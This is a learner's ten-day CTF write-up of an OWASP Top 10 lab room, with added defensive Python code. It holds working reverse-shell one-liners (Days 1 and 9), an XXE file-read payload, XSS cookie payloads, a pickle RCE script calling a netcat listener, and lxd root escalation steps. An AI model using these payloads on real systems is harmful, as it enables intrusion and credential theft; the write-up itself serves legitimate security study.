Learn one of the OWASP vulnerabilities every day for 10 days in a row. A new task will be revealed every day, where each task will be independent of the previous one. These challenges will cover each OWASP topic:
- Day 1) Injection
- Day 2) Broken Authentication
- Day 3) Sensitive Data Exposure
- Day 4) XML External Entity
- Day 5) Broken Access Control
- Day 6) Security Misconfiguration
- Day 7) Cross-site Scripting
- Day 8) Insecure Deserialization
- Day 9) Components with Known Vulnerabilities
- Day 10) Insufficient Logging & Monitoring
The challenges are designed for beginners and assume no previous knowledge of security. On every challenge I will also try to play around with the machine, and I call that part BONUS TIME.
DAY 1️⃣: Injection
We need to go to http://<IP>/evilshell.php
[What strange text file is in the website root directory?]
(ls)
* drpepper.txt
[How many non-root/non-service/non-daemon users are there?]
(cat /etc/passwd)
* 0
[What user is this app running as?]
(whoami)
* www-data
[What is the user's shell set as?]
(cat /etc/passwd)
* /usr/sbin/nologin
[What version of Ubuntu is running?]
(lsb_release -a)
* 18.04.4
[Print out the MOTD. What favorite beverage is shown?]
(cat /etc/update-motd.d/00-header)
* Dr Pepper
BONUS TIME (DAY 1)
Since we can do command injection, let's get a reverse shell!
/usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<IP>",<PORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
But I can't seem to find anything interesting T_T
DAY 2️⃣: Broken Authentication
Let's check the website on port 8888.
From what we learned, let's try to register a darren account with a space in the username.
Username: darren
Password: anything
When we log in with the new credentials, we get the first flag!
Let's use the same trick on Arthur and we will get the second flag!
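As an added example (not the room's source), here is a constructed reproduction of the registration weakness beside a hardened store that canonicalises the username before both the uniqueness check and login, and stores a salted PBKDF2 digest instead of the password. How the vulnerable app really behaves internally is an assumption, as are the field names and the work factor.

```python
import hashlib
import hmac
import os
import unicodedata

class NaiveUserStore:
    """Constructed reproduction of the weakness: uniqueness is checked on the raw
    string, but the identity the app uses afterwards is a trimmed copy."""
    def __init__(self):
        self.users = {}                 # raw username -> password (plaintext, deliberately naive)
    def register(self, raw_username, password):
        if raw_username in self.users:  # "darren " != "darren", so the check passes
            raise ValueError("username already taken")
        self.users[raw_username] = password
    def login(self, raw_username, password):
        if self.users.get(raw_username) != password:
            return None
        return raw_username.strip()     # ...and now "darren " is treated as darren

def canonical_username(raw):
    """One canonical form, used for the uniqueness check AND every later lookup."""
    name = unicodedata.normalize("NFKC", raw).casefold()
    if any(ch.isspace() for ch in name) or not name.isprintable() or not 3 <= len(name) <= 32:
        raise ValueError("username must be 3-32 printable characters without whitespace")
    return name

class HardenedUserStore:
    ITERATIONS = 200_000                # PBKDF2 work factor chosen for this demo
    def __init__(self):
        self.users = {}                 # canonical name -> (salt, PBKDF2 digest)
    def _digest(self, password, salt):
        return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, self.ITERATIONS)
    def register(self, raw_username, password):
        name = canonical_username(raw_username)
        if name in self.users:          # "Darren" collapses to darren; " darren" is refused outright
            raise ValueError("username already taken")
        salt = os.urandom(16)
        self.users[name] = (salt, self._digest(password, salt))
    def login(self, raw_username, password):
        try:
            name = canonical_username(raw_username)
        except ValueError:
            return None
        record = self.users.get(name)
        if record is None:
            return None
        salt, digest = record
        return name if hmac.compare_digest(self._digest(password, salt), digest) else None
```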
BONUS TIME (DAY 2)
Let's try nmap on this machine
22/tcp open ssh
5000/tcp open http
7777/tcp open http
8888/tcp open http
Port 5000
I can't find anything that is working but you can try to take a look.
Port 7777
As soon as I create a new user, something catches my eye: there is a private space for a new user.
The private space looks like this.
Then I tried to play with the URL and found the admin password? But I didn't find anything after that.
DAY 3️⃣: Sensitive Data Exposure
Let's use dirsearch to check any interesting files.
When we open /assets we find this file.
Let’s use sqlite3 to open the db file.
Let's crack the admin password using hashcat.
hashcat -m 0 hash <wordlist>
Once we have the password we can try to log in. We got the flag! :)
[What is the name of the mentioned directory?]
* /assets
[Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data?]
* webapp.db
BONUS TIME (DAY 3)
Nothing interesting that can be found haha
DAY 4️⃣: XML External Entity
[Full form of XML]
* Extensible Markup Language
[Is it compulsory to have XML prolog in XML documents?]
* No
[Can we validate XML documents against a schema?]
* Yes
[How can we specify XML version and encoding in XML document?]
* XML prolog
[How do you define a new ELEMENT?]
* !ELEMENT
[How do you define a ROOT element?]
* !DOCTYPE
[How do you define a new ENTITY?]
* !ENTITY
The challenge site looks like this.
Let's try to display our name.
<?xml version="1.0" ?>
<!DOCTYPE replace [<!ENTITY example "Is Here"> ]>
<userInfo>
<firstName>H0j3n</firstName>
<lastName>&example;</lastName>
</userInfo>
For the payloads, we can take a look at [1], which is from PayloadsAllTheThings ❤. I take this payload, which can read /etc/passwd.
<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><root>&test;</root>
We can then try which other files we can read.
[What is the name of the user in /etc/passwd]
* falcon
[Where is falcon's SSH key located?]
* /home/falcon/.ssh/id_rsa
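An added example, not code from the room: a small expat-based parser for the userInfo document above that rejects any DOCTYPE, so neither the &example; entity nor the SYSTEM entity can ever be declared, plus an allow_dtd switch that shows why the internal entity expanded on the challenge site. The element names come from the page; the parser configuration and the DTDForbidden name are mine.

```python
from xml.parsers import expat

class DTDForbidden(ValueError):
    """Raised when a document declares a DOCTYPE, i.e. could define entities."""

def parse_user_info(xml_text, allow_dtd=False):
    """Extract firstName/lastName from <userInfo>. With allow_dtd=False (the
    hardened default) any DOCTYPE is rejected before an entity can be defined."""
    fields, buf = {}, []

    def start_doctype(name, sysid, pubid, has_internal_subset):
        raise DTDForbidden("DOCTYPE/ENTITY declarations are not accepted")

    def start_element(name, attrs):
        buf.clear()

    def char_data(data):            # entity expansions arrive here in chunks, hence the buffer
        buf.append(data)

    def end_element(name):
        if name in ("firstName", "lastName"):
            fields[name] = "".join(buf).strip()

    p = expat.ParserCreate()
    if not allow_dtd:
        p.StartDoctypeDeclHandler = start_doctype
    # Belt and braces for the allow_dtd=True path: never read parameter entities, and
    # returning 0 from the external-entity hook makes expat abort instead of fetching file:// URLs.
    p.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    p.ExternalEntityRefHandler = lambda context, base, sysid, pubid: 0
    p.StartElementHandler = start_element
    p.EndElementHandler = end_element
    p.CharacterDataHandler = char_data
    p.Parse(xml_text, True)
    return fields
```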
BONUS TIME (DAY 4)
Let’s nmap first to see which port is open.
22/tcp open ssh
80/tcp open http
Since we got the id_rsa of falcon, let's try to use ssh with it.
Okay, we managed to get in :) Inside the falcon home directory we found user.txt. I tried to get root, and the only way I managed was through the lxd group haha. Just follow the steps below.
#Attacker Machine
* git clone https://github.com/saghul/lxd-alpine-builder.git
* cd lxd-alpine-builder
* ./build-alpine
Then transfer the generated image file to the victim machine.
#Victim Machine
* lxc image import ./alpine-v3.12-x86_64-20200717_2325.tar.gz --alias myimage
* lxc image list
* lxc init myimage ignite -c security.privileged=true
* lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
* lxc start ignite
* lxc exec ignite /bin/sh
Then inside the container: cd /mnt/root/
DAY 5️⃣: Broken Access Control (IDOR)
We got the credentials to login on the website.
Once we are inside, take a look at the URL: there is a parameter that can be manipulated.
Since the default value is the number 1, let's use Burp Suite's Intruder with a payload of numbers.
We got a hit on 0! We got the flag for Day 5 :)
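As an added example (not the challenge's code), a constructed note store showing the kind of lookup that makes id=0 readable by anyone, beside the server-side ownership check that closes the IDOR. The table contents, the user ids, and the single "not found" response for both a missing record and someone else's record are my assumptions.

```python
from urllib.parse import parse_qs

class AccessDenied(PermissionError):
    pass

# Constructed in-memory table (not the challenge's database): note id -> (owner user id, body).
# Ids are small sequential integers, which is exactly what Intruder enumerated above.
NOTES = {
    0: (0, "record belonging to the admin account (constructed)"),
    1: (1, "note belonging to user 1"),
    2: (2, "note belonging to user 2"),
}

def get_note_vulnerable(session_user_id, note_id, store=NOTES):
    """Trusts the id from the URL outright: any logged-in user can read any note."""
    return store[note_id][1]

def get_note(session_user_id, note_id, store=NOTES):
    """Server-side authorisation: the record must belong to the caller."""
    record = store.get(note_id)
    if record is None or record[0] != session_user_id:
        # One identical response for 'missing' and 'not yours', so enumeration learns nothing.
        raise AccessDenied("note not found")
    return record[1]

def handle_request(session_user_id, query_string, store=NOTES):
    """Parse '?id=N' the way the page does (default 1), then go through get_note."""
    params = parse_qs(query_string)
    try:
        note_id = int(params.get("id", ["1"])[0])
    except ValueError:
        return 400, "bad id"
    try:
        return 200, get_note(session_user_id, note_id, store)
    except AccessDenied:
        return 404, "not found"
```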
BONUS TIME (DAY 5)
Let’s nmap first to see which port is open.
22/tcp open ssh
80/tcp open http
81/tcp open http
82/tcp open http
Let's use Dirsearch and take a look if we can find any information inside.
Port 80
admin.txt is the flag that we got, and I can’t use LFI inside here.
Port 81
So we got index.php only; let’s try to open it.
I have tried and when we click submit we will go inside here.
Port 82
So this time we got a flag.txt? And I have tried to play with that api.php but nothing works.
DAY 6️⃣: Security Misconfiguration
We are given a VM with a web application. This VM will focus on default passwords.
Then let’s try to use dirsearch to look for more information.
It seems like there's nothing to be found haha. So by looking at the hint we find out that we need to look at the documentation of the source code. So let's try to check on GitHub!
#Search This
Pensive Notes
A note taking app for people who like to think about their notes
Nice! Then we can find the credentials at the bottom of the README.md.
Alright, let's log in again using these credentials. We got the flag! :)
BONUS TIME (DAY 6)
Nothing to be found
DAY 7️⃣: Cross-site Scripting
We need to go to the reflected page and start our first challenge.
#1 Reflected XSS
We can see a lot of payloads for XSS in [1]. A simple one that we should know looks like this.
<script>alert("Hello")</script>
Then the next challenge is to pop out with our machine IP address.
<script>alert(window.location.host)</script>
#2 Stored XSS
For this challenge, we need to go to stored page.
First, we need to register our account and then go to Stored XSS again for the next challenge.
We can try to add any HTML but here is mine.
<html>
<body>
<h1>Button H0j3n</h1>
<button type="button" onclick="alert('Hello world!')">Click Me</button>
</body>
</html>
For the next challenge, we need to pop out with our document cookies.
<script>alert(document.cookie)</script>
#3 DOM-Based XSS
For the next challenge, we need to change the "XSS Playground" text to "I am a hacker". So first we need to inspect the element of the XSS Playground.
We can take a look at the hint but make sure we understand how it works too :)
<script>document.querySelector('#thm-title').textContent = 'I am a hacker'</script>
BONUS TIME (DAY 7)
Nothing to be found
DAY 8️⃣: Insecure Deserialization
“Insecure Deserialization is a vulnerability which occurs when untrusted data is used to abuse the logic of an application” (Acunetix, 2017)
By looking at Wikipedia we can get the answer for the developer.
[Who developed the Tomcat application?]
* The Apache Software Foundation
[What type of attack that crashes services can be performed with insecure deserialization?]
* Denial of Services
# Objects
A prominent element of object-oriented programming (OOP), objects are made up of two things which are State and Behaviour.
[If a dog was sleeping, would this be:]
* A Behaviour
# Deserialization
Insecure deserialization occurs when data from an untrusted party (i.e. a hacker) gets executed because there is no filtering or input validation; the system assumes that the data is trustworthy and will execute it no holds barred. (Credits TryHackMe)
[What is the name of the base-2 formatting that data is sent across a network as?]
* binary
# Cookies
Cookies can be set in various website programming languages, for example JavaScript, PHP or Python, to name a few.
[If a cookie had the path of webapp.com/login , what would the URL that the user has to visit be?]
* webapp.com/login
[What is the acronym for the web technology that Secure cookies work over?]
* https
For the practical times, we need to navigate to the web application.
Okay first let us sign up with our account.
Here we can see our profile page.
So let's inspect the element and go to Storage and decode the Cookie to get the first flag.
To get the second flag we need to change the user type as admin and go to the admin page.
The next one is much more interesting.
A much more nefarious attack than simply decoding cookies; we get into the nitty-gritty.
Make sure to change the usertype to the user and navigate to the feedback page. Please read the explanation on how it works in TryHackMe :)
import pickle
import sys
import base64

command = 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | netcat YOUR_TRYHACKME_VPN_IP 4444 > /tmp/f'

class rce(object):
    def __reduce__(self):
        import os
        return (os.system, (command,))

print(base64.b64encode(pickle.dumps(rce())))
After replacing the IP we can run the script and copy the output, then paste it inside the cookie while listening. Make sure to refresh to make it work.
New things to learn and like always I will update to my notes :) So let's get our flag!
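As an added example (not the room's or the author's code), here is what the feedback page should have done instead: first a restricted unpickler that refuses the global the payload above relies on, then the preferable design, a plain JSON cookie authenticated with an HMAC so a userType changed to admin is rejected outright and nothing is ever deserialised as code. The function names, the cookie layout and SECRET_KEY are assumptions for this demo.

```python
import base64
import builtins
import hashlib
import hmac
import io
import json
import pickle

# Mitigation 1: if pickle cannot be removed yet, refuse every global the app did not expect.
SAFE_BUILTINS = {"set", "frozenset", "range", "slice", "complex"}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # The script above pickles os.system, which resolves to posix.system on Linux;
        # both GLOBAL and STACK_GLOBAL opcodes come through this hook and are refused here,
        # before anything is called.
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")

def load_cookie_restricted(cookie_b64):
    """Decode the base64 cookie and unpickle it with the allow-list unpickler."""
    return RestrictedUnpickler(io.BytesIO(base64.b64decode(cookie_b64))).load()

# Mitigation 2 (preferred): keep the cookie as JSON and authenticate it with an HMAC.
SECRET_KEY = b"constructed-demo-key"   # placeholder; a real app loads this from config, never hard-codes it

def make_session_cookie(session, key=SECRET_KEY):
    body = base64.urlsafe_b64encode(json.dumps(session, sort_keys=True).encode()).decode()
    tag = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    return f"{body}.{tag}"

def read_session_cookie(cookie, key=SECRET_KEY):
    """Return the session dict, or None for a malformed or tampered cookie."""
    body, sep, tag = cookie.rpartition(".")
    if not sep:
        return None
    expected = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):   # constant-time comparison of the tag
        return None
    return json.loads(base64.urlsafe_b64decode(body))
```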
BONUS TIME (DAY 8)
I tried to get root using lxd but didn't find anything haha. The struggle is real xD
DAY 9️⃣: Components With Known Vulnerabilities
Exploit Database, also known as ExploitDB, is a website people use to search for vulnerabilities or exploits for certain software or certain versions. Let’s do this challenge!
First, we need to know what application this website uses. So let's use dirsearch.
So we found a few directories and files. The database seems interesting for us to get more information.
Okay! we found readme.txt, let’s open it.
Okay, this would help us search for this application.
Nice! Okay since we know it is PHP-BookStore, let’s search for the exploit in ExploitDB.
Okay, since it is available in exploit-db, I will show how I usually use searchsploit to search for an exploit.
#To Search
searchsploit book store
Since that's the only one with a python script, let’s download and use it.
#To download
searchsploit -x php/webapps/47887.py >exploit.py
Make sure to comment on the top of the file like this.
Okay, now we can run the exploit :)
Deny the error and just copy the URL given and let's get a reverse shell :)
#Python3 Reverse Shell
/usr/bin/python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
So let’s check how many characters are in /etc/passwd and submit it!
wc -c /etc/passwd
BONUS TIME (DAY 9)
Let’s enumerate more to see if we can get to root. Since we know there is a user named test, I was just curious and tried test as the password, and yeah, we got the test user xD
Let’s sudo -l
Alright, this one we can get to root easily!
sudo bash
But again there is nothing interesting to be found :’)
DAY 🔟: Insufficient Logging and Monitoring
So we are given a text file which consists of logging with sensitive information.
If we take a look, the same IP is used to log in again and again. It keeps going for 15 minutes until it gets root: it took the attacker around 15 minutes to brute-force the login until the box was rooted.
[What IP address is the attacker using?]
* 49.99.13.16
[What kind of attack is being carried out?]
* brute force
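Added example, not the room's log file: a detector over a constructed login log in an assumed format (timestamp, status, user, source IP) that flags a source IP once it crosses a failure threshold inside a 15-minute window and escalates when a success follows from the same IP, which is exactly the pattern described above. The threshold, window and log layout are my choices.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log (not the room's file). Assumed format: "<ISO timestamp> <OK|FAILED> <user> <source IP>".
SAMPLE_LOG = """\
2018-12-01T13:30:05 OK     greg.ess  30.41.12.18
2018-12-01T13:48:00 FAILED jr22      49.99.13.16
2018-12-01T13:52:30 FAILED jr22      49.99.13.16
2018-12-01T13:55:10 FAILED admin     49.99.13.16
2018-12-01T13:58:45 FAILED root      49.99.13.16
2018-12-01T14:01:20 FAILED root      49.99.13.16
2018-12-01T14:03:00 OK     root      49.99.13.16
2018-12-01T14:05:00 FAILED greg.ess  30.41.12.18
"""

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<status>OK|FAILED)\s+(?P<user>\S+)\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})$")

def parse_log(text):
    """Return (timestamp, status, user, ip) tuples; lines that do not match the format are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            events.append((datetime.fromisoformat(m["ts"]), m["status"], m["user"], m["ip"]))
    return events

def detect_brute_force(events, threshold=5, window=timedelta(minutes=15)):
    """Flag an IP once `threshold` failures land inside `window`; if a later success
    comes from a flagged IP, record which account it got into."""
    recent = defaultdict(list)           # ip -> failure timestamps still inside the window
    alerts = {}
    for ts, status, user, ip in sorted(events):
        if status == "FAILED":
            q = recent[ip]
            q.append(ts)
            while ts - q[0] > window:    # slide the window forward
                q.pop(0)
            if len(q) >= threshold and ip not in alerts:
                alerts[ip] = {"failures": len(q), "first": q[0], "last": ts, "compromised": None}
        elif ip in alerts and alerts[ip]["compromised"] is None:
            alerts[ip]["compromised"] = user    # brute force followed by a login: escalate now
    return alerts
```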
Thank you for this room; I learned a lot from Day 1 until Day 10!
If there are any suggestions, please tell me, and if there is something I can improve, please do tell me too. Hope this writeup helps someone, and let’s learn together :)